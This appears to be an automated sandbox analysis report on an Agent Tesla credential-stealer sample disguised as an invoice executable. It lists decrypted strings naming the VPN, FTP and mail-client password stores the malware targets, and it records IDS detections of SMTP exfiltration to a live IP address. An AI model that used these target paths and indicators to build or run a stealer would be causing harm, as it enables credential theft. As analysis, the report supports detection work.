                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: auth-data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: entropy
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: USERPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \OpenVPN\config\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: remote
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: remote
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVpn.exe*
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: user.config
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: //setting[@name='Username']/value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: //setting[@name='Password']/value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: %ProgramW6432%
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access\data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ProgramFiles(x86)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Private Internet Access\data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \account.json
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .*"username":"(.*?)"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .*"password":"(.*?)"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: privateinternetaccess.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FileZilla
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Server>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: CoreFTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PW
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: User
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Host
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Port
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hdfzpysvpzimorhk
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WinSCP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HostName
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UserName
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PublicKeyFile
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PortNumber
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 22
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WinSCP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: A
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 10
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: B
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 11
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: C
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 12
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: D
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 13
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: E
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 14
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: F
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 15
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ABCDEF
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Flash FXP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: port
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: user
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: quick.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Sites.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FlashFXP\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FlashFXP\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTP Navigator
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FTP Navigator\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: No Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: User
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmartFTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WS_FTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HOST
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UID
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FtpCommander
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \cftp\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;User=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Server=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Port=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Port=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;User=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Anonymous=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTPGetter
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FTPGetter\servers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTPGetter
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: The Bat!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \The Bat!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.CFN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.CFN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: zzz
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Becky!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: DataDir
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Folder.lst
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Mailbox.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PassWd
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Becky!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Outlook
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IMAP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3 Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HTTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IMAP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3 Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HTTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Mail App
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SchemaId
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pResourceElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pIdentityElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pPackageSid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pAuthenticatorElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: syncpassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: mailoutgoing
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FoxMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Executable
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FoxmailPath
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Storage\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Storage\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts\Account.rec0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts\Account.rec0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.stg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.stg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3Host
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPHost
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IncomingServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 5A
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 71
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Opera Mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: opera:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PocoMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Pocomail\accounts.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POPPass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPPass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client\accounts.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "Username":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "Secret":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "ProviderName":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: o6806642kbM7c5
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Mailbird
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SenderIdentities
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Mailbird\Store\Store.db
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server_Host
                Source: INVOICE_NO._29998172.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE_NO._29998172.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tSku.pdb source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: Binary string: tSku.pdbSHA256[ source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 4x nop then jmp 0A6D75C3h
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 4x nop then jmp 0AAB75C3h

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49698 -> 5.100.152.24:587
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: global trafficTCP traffic: 192.168.2.3:49697 -> 5.100.152.24:587
                Source: global trafficTCP traffic: 192.168.2.3:49697 -> 5.100.152.24:587
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 00000005.00000002.437574152.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.364564498.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364485994.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364509296.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364376733.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.5
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363538297.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364115711.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363520351.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363556816.0000000005DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comitk
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363657222.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comj
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.366549798.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365774175.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.365970540.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366153312.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366056911.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365997383.0000000005DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlC
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.365753646.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365728088.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiona
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comttco
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398030415.0000000001607000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
